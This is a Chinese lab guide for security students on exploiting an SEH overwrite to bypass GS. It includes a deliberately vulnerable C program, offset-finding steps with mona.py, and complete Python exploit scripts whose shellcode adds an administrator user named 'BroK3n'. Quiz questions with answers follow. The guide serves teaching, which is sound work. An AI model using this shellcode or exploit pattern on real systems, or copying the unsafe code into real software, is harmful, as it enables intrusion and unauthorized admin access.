实验指导书

从零开始学习软件漏洞挖掘系列教程第三篇 : 利用 SEH 机制 Exploit it 1 实验简介 实验所属系列 : 系统安全 实验对象 : 本科 / 专科网络 / 信息安全专业 相关课程及专业 : 计算机网络, 信息安全 实验时数 ( 学分 ):2 学时 实验类别 : 实践实验类 2 实验目的 在传统的缓冲区溢出中, 我们可以通过覆盖返回地址以跳转到 shellcode 但并不是所有的溢出都是那么简单的 比如当程序有 GS 保护的情况下, 我们不能直接覆盖返回地址 今天, 我们将看到另一种使用异常处理机制的漏洞利用技术 该技术可以绕过 GS 的保护 通过该实验我们了解覆盖 SEH 绕过 GS 的漏洞利用技术 3 预备知识 1. 关于程序异常处理的一些基础知识什么是异常处理例程? 一个异常处理例程是内嵌在程序中的一段代码, 用来处理在程序中抛出的异常 一个典型的异常处理例程如下所示 : try { //run stuff. If an exception occurs, go to code } catch { // run stuff when exception occurs } Windows 中有一个默认的 SEH( 结构化异常处理例程 ) 捕捉异常 如果 Windows 捕捉到了一个异常, 你会看到 XXX 遇到问题需要关闭 的弹窗 这通常是默认异常处理的结果 很明显, 为了编写健壮的软件, 开发人员应该要用开发语言指定异常处理例程, 并且把 Windows 的默认 SEH 作为最终的异常处理手段 当使用语言式的异常处理 ( 如 :try...catch), 必须要按照底层的操作系统生成异常处理例程代码的链接和调用 ( 如果没有一个异常处理例程被调用或有效的异常处理例程无法处理异常, 那么 Windows SEH

将被使用 (UnhandledExceptionFilter)) 所以当执行一个错误或非法指令时, 程序将有机会来处理这个异常和做些什么 如果没指定异常处理例程的话, 那么操作系统将接管异常和弹窗, 并询问是否要把错误报告发送给 MS 异常处理包括两个结构 Pointer to next SHE record 指向下一个异常处理 Pointer to Exception Handler 指向异常处理函数 4 实验环境 服务器 :Windows 7 SP1,IP 地址 : 随机分配 辅助工具 :Windbg,ImmunityDebugger,python2.7,mona.py Windbg 是在 windows 平台下, 强大的用户态和内核态调试工具 Immunity Debugger 软件专门用于加速漏洞利用程序的开发, 辅助漏洞挖掘以及恶意软件分析 python 是一种面向对象 解释型计算机程序设计语言 mona.py 是由 corelan team 整合的一个可以自动构造 Rop Chain 而且集成了 metasploit 计算偏移量功能的强大挖洞辅助插件 注 本实验成功与否与实验环境, 工具等相关 5 实验步骤 首先我们对目标程序进行尝试溢出, 看看是否能够覆盖到 SEH, 然后计算多少个字符可以覆盖到到 SEH, 寻找合适的 POP POP RETN 序列和 SHELLCODE 构造我们的 Exploit 我们的任务分为 3 个部分 : 1. 尝试溢出 2. 定位溢出点

3. 构造利用 5.1 实验任务一 前言下面是我写的有漏洞程序的源码 //by www.netfairy.net #include<windows.h> #include<string.h> #include<stdio.h> void test(char *str) { char buf[8]; strcpy(buf,str); } int main() { FILE *fp; int i; char str[30000]; LoadLibrary("C:\\Netfairy.dll"); if((fp=fopen("c:\\test.txt","r"))==null) { printf("\nfile can not open!"); getchar(); exit(0); } for(i=0;;i++) { if(!feof(fp)) { str[i]=fgetc(fp);

} else { break; } } test(str); fclose(fp); getchar(); return 0; } 注 本有漏洞的程序名为 test.exe, 在 C 盘下可以找到. 任务描述 : 使用恶意构造的文件溢出目标程序并计算溢出点当我们拿到一个软件, 正常情况下, 我们先试试能不能溢出利用它 利用下面 python 代码试试 filename="c:\\test.txt"# 待写入的文件名 myfile=open(filename,'w') # 以写方式打开文件 filedata="a"*50000 # 待写入的数据 myfile.write(filedata) # 写入数据 myfile.close() # 关闭文件 这里产生 50000 个 A, 运行这 python 代码, 在 C 盘下会产生 5000 个 A 组成的 test.txt 文件 然后用 windbg 打开程序, 执行命令 g, 可以看到,windbg 捕获到了异常, 再用! exchain 查看 SEH 链

我们利用超长字符串成功覆盖了 SEH 接下来就是定位溢出点了, 也就是多少个字符可以覆盖到 SEH. 首先我们用 ImmunityDebugger 的 mona.py 插件产生 50000 个随机字符!mona pc 50000

然后把找到 patttern.txt 这个文件, 把选中的内容去掉 网络精灵 www.netfairy.net

改名为 test.txt 替换原 C 盘下的 test.txt 文件 然后再次用 windbg 打开我们的 test.exe 程 序, 输入命令 g 运行崩溃, 在输入!exchain 查看异常处理链, 如下图 可以看到 Pointer to next SHE record 被覆盖为 0x356e4d34, 也就是字符串 5nM4 因为因 为这是小序存放, 所以反过来就是 4Mn5 我们打开 ImmunityDebugger 在命令行输入!mona pattern_offset 4Mn5 由上图可知我们可以知道 4Mn5 出现在 9764 位置, 所以理论上我们填充 9764 个字符就可以覆盖到 Pointer to next SHE record 了, 但是我最了一下测试发现 9764 个字符没有覆盖到 Pointer to next SHE record 难道我们计算有错? 其实不是的, 我们刚才产生了 50000 个随机字符对吧? 我发现这 50000 个字符每隔 20280 就循环一次, 所以我们需要覆盖 9764 +20280 个字符才可以覆盖到 Pointer to next SEH record, 因此我们把前面的 python 代码改成下面这样 filename="c:\\test.txt"# 待写入的文件名 myfile=open(filename,'w') # 以写方式打开文件

filedata="a"*30044 # 待写入的数据 myfile.write(filedata) # 写入数据 myfile.close() # 关闭文件 重新产生 test.txt 文件, 然后用 ImmunityDebugger 打开 test.exe 程序并运行, 程序出现异常, 此时看 0x18ff78 这个地址, 我们发现 AAAAAA 还差 20 个字符覆盖到 Pointer to next SHE record 因此我们把前面的 python 代码的这句 filedata="a"*30044 # 待写入的数据改成 filedata="a"*30064 # 待写入的数据 再次用 ImmunityDebugger 运行 test.exe

可以看到刚好能覆盖到地址 0x18ff78, 也就是 Pointer to next SHE record ok, 定位完成 注 本实验与环境关系很大, 可能你做的跟我的不完全一样, 大家随机应变 学会思路就 行 5.1.1. 练习 关于覆盖 SEH, 下列说法正确的是是? 单选题 A 我们可以覆盖 SHE 那么一定也可以覆盖返回地址并利用 B 覆盖 SEH 中我们只需要覆盖 Pointer to next SEH record C 如果程序没有写异常处理那么就不能利用 SEH

D 需要用 POP POP RETN 序列的地址覆盖 Pointer to Exception Handler 答案 :D 5.2 实验任务二 任务描述 : 构造我们的利用代码 1 由前面可知我们填充 30044 个字符就可以覆盖到 Pointer to next SHE record seh 利用的格式是 30064 填充物 + "\xeb\x06\x90\x90" +pop pop retn 指令序列地址 +shellcode 我这里给出一个在 Windows 7 64 位 sp1 下可用的 shellcode // 添加用户 shellcode "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"\ "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"\ "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"\ "\x34\xaf\x01\xc6\x45\x81\x3e\x57\x69\x6e\x45\x75\xf2\x8b\x7a"\ "\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf"\ "\xfc\x01\xc7\x68\x4b\x33\x6e\x01\x68\x20\x42\x72\x6f\x68\x2f"\ "\x41\x44\x44\x68\x6f\x72\x73\x20\x68\x74\x72\x61\x74\x68\x69"\ "\x6e\x69\x73\x68\x20\x41\x64\x6d\x68\x72\x6f\x75\x70\x68\x63"\ "\x61\x6c\x67\x68\x74\x20\x6c\x6f\x68\x26\x20\x6e\x65\x68\x44"\ "\x44\x20\x26\x68\x6e\x20\x2f\x41\x68\x72\x6f\x4b\x33\x68\x33"\ "\x6e\x20\x42\x68\x42\x72\x6f\x4b\x68\x73\x65\x72\x20\x68\x65"\ "\x74\x20\x75\x68\x2f\x63\x20\x6e\x68\x65\x78\x65\x20\x68\x63"\ "\x6d\x64\x2e\x89\xe5\xfe\x4d\x53\x31\xc0\x50\x55\xff\xd7"

还差 pop pop retn 序列就行了, 其实我觉得最难的就是找 pop pop retn 序列, 如果在 xp 下倒不是什么问题,win7 以上微软加入了各种安全保护措施, 如 safeseh 这就是为什么前面程序代码中我加入了 LoadLibrary("C:\\Netfairy.dll"); 因为系统的 dll 基本上都有 safeseh, 所以我们需要找到一个没有 safeseh 的模块, 它就是 Netfairy.dll, 并且这个模块有 pop pop retn 序列 下面说下怎么在 Netfairy.dll 查找 pop pop retn 首先用 ImmunityDebugger 载入 test.exe 程序并运行, 出现异常后点工具栏的按 Atl+M 哈哈, 看到我们的 netfairy.dll 模块了吧, 然后

看到了吧,0x50021344 有我们想要的 pop pop retn 序列 50021344 5E POP ESI 50021345 5B POP EBX 50021346 C3 RETN 所以, 完整的 exploit 是这样 filename="c:\\test.txt"# 待写入的文件名 myfile=open(filename,'w') # 以写方式打开文件 filedata="a"*30044+"\xeb\x06\x90\x90"+"\x44\x13\x02\x50"+\ "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"\ "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"\ "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"\ "\x34\xaf\x01\xc6\x45\x81\x3e\x57\x69\x6e\x45\x75\xf2\x8b\x7a"\

"\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf"\ "\xfc\x01\xc7\x68\x4b\x33\x6e\x01\x68\x20\x42\x72\x6f\x68\x2f"\ "\x41\x44\x44\x68\x6f\x72\x73\x20\x68\x74\x72\x61\x74\x68\x69"\ "\x6e\x69\x73\x68\x20\x41\x64\x6d\x68\x72\x6f\x75\x70\x68\x63"\ "\x61\x6c\x67\x68\x74\x20\x6c\x6f\x68\x26\x20\x6e\x65\x68\x44"\ "\x44\x20\x26\x68\x6e\x20\x2f\x41\x68\x72\x6f\x4b\x33\x68\x33"\ "\x6e\x20\x42\x68\x42\x72\x6f\x4b\x68\x73\x65\x72\x20\x68\x65"\ "\x74\x20\x75\x68\x2f\x63\x20\x6e\x68\x65\x78\x65\x20\x68\x63"\ 据 "\x6d\x64\x2e\x89\xe5\xfe\x4d\x53\x31\xc0\x50\x55\xff\xd7" # 待写入的数 myfile.write(filedata) # 写入数据 myfile.close() # 关闭文件 运行这段 python 代码, 然后用 ImmunityDebugger 打开 test.exe 程序并运行 Perfect!!! 我们看到了 Pointer to Exception Handler 成被覆盖为 50021344, 还有我们 的 shellcode 然而, 先高兴太早, 请你先仔细看

我数了一下我的 shellcode 长度是是 194 个字节, 你再计算 Pointer to Exception Handler 后到最底下, 少于 194 字节对不? 那就说明我们的 shellcode 被截断了 缓冲区太短了, 我们的 shellcode 放不下 那怎么办, 换个短到合适的 shelocode? 但是我手头没有, 于是, 想到了跳转, 没错 前面我们不是填充了 30064 个 A 吗? 那里有大把的空间啊, 我们为何不把 shellcode 放在那里? 我们可以在 Pointer to next SHE record 放一个往前跳的指令, 就可以跳到我们的 shellcode 了, 我附上我的 POC filename="c:\\test.txt"# 待写入的文件名 myfile=open(filename,'w') # 以写方式打开文件 filedata="a"*29770+"\x90"*100+"\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\ x8b\x52\x1c\x8b\x42"\ "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"\ "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"\ "\x34\xaf\x01\xc6\x45\x81\x3e\x57\x69\x6e\x45\x75\xf2\x8b\x7a"\ "\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf"\ "\xfc\x01\xc7\x68\x4b\x33\x6e\x01\x68\x20\x42\x72\x6f\x68\x2f"\ "\x41\x44\x44\x68\x6f\x72\x73\x20\x68\x74\x72\x61\x74\x68\x69"\

"\x6e\x69\x73\x68\x20\x41\x64\x6d\x68\x72\x6f\x75\x70\x68\x63"\ "\x61\x6c\x67\x68\x74\x20\x6c\x6f\x68\x26\x20\x6e\x65\x68\x44"\ "\x44\x20\x26\x68\x6e\x20\x2f\x41\x68\x72\x6f\x4b\x33\x68\x33"\ "\x6e\x20\x42\x68\x42\x72\x6f\x4b\x68\x73\x65\x72\x20\x68\x65"\ "\x74\x20\x75\x68\x2f\x63\x20\x6e\x68\x65\x78\x65\x20\x68\x63"\ "\x6d\x64\x2e\x89\xe5\xfe\x4d\x53\x31\xc0\x50\x55\xff\xd7"+\ "\xeb\x06\x90\x90"+"\x44\x13\x02\x50"\ "\xe9\x03\xff\xff\xff" #00 18FF80 E9 03FFFFFF JMP 0018FE88 myfile.write(filedata) # 写入数据 myfile.close() # 关闭文件 先运行这段 python 代码, 然后运行目标程序, 打开 dos 窗口, 输入 net user 看看 可见成功添加名为 BroK3n 的用户溢出成功, 执行了我们的 shellcode, 漏洞利用成功

5.2.1. 练习 以下说法不正确的是 : 单选题 A 如果 POP POP RETN 模块有 safeseh, 那么将不能利用成功 B 覆盖 Pointer to next SHE record 的 EB 06 90 90 是作为跳到 shellcode 的跳板 C shellcode 只能布置在 Pointer to Exception Handler 后面 D shellcode 不能出现 \00 和其他坏字符 答案 :C 6 实验报告要求 参考实验原理与相关介绍, 完成实验任务, 并对实验结果进行分析, 完成思考题目, 总结实验的心得体会, 并提出实验的改进意见 7 分析与思考 1) 很多时候我们会选着覆盖返回地址加以利用, 但是现在的操作系统引入了各种保护措施, 使得利用更加困难 比如 GS 可以成功挫败很多基于覆盖返回地址的利用 2) 关于覆盖 SEH 微软也有相应的防护措施, 如 safeseh 但是其中也有绕过的办法, 在特定的情况下还是可以利用成功 8 参考 网络精灵 www.netfairy.net